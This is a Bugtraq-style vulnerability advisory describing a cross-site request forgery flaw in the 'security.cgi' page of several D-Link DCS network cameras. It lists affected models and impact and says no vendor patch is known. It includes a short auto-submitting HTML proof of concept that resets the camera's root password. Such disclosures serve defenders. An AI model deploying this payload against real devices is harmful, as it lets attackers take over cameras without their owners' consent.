Multiple D-Link DCS Products 'security.cgi' Cross-Site Request Forgery Vulnerability

Bugtraq ID:	52134
Class:	Design Error
CVE:
Remote:	Yes
Local:	No
Published:	Feb 23 2012 12:00AM
Updated:	Feb 23 2012 12:00AM
Credit:	Rigan Iimrigan
Vulnerable:	D-Link DCS-900 0 D-Link DCS-5300 0 D-Link DCS-2000 0
Not Vulnerable:

Multiple D-Link DCS Products 'security.cgi' Cross-Site Request Forgery Vulnerability

The D-Link DCS-900, DCS-2000, and DCS-5300 are prone to a cross-site request-forgery vulnerability.

Successful exploits may allow attackers to run privileged commands on the affected device, change configuration, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.

This issue affects D-Link DCS-900, DCS-2000, and DCS-5300.

Multiple D-Link DCS Products 'security.cgi' Cross-Site Request Forgery Vulnerability

To exploit this issue, an attacker must entice an unsuspecting victim to follow a malicious URI.

The following example data is available:

<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://www.example.com/setup/security.cgi">
<input type="hidden" name="rootpass" value="your_pass"/>
<input type="hidden" name="confirm" value="your_pass"/>
</form>
</body>
</html>

Multiple D-Link DCS Products 'security.cgi' Cross-Site Request Forgery Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].

Multiple D-Link DCS Products 'security.cgi' Cross-Site Request Forgery Vulnerability

References:

• D-Link Homepage (D-Link)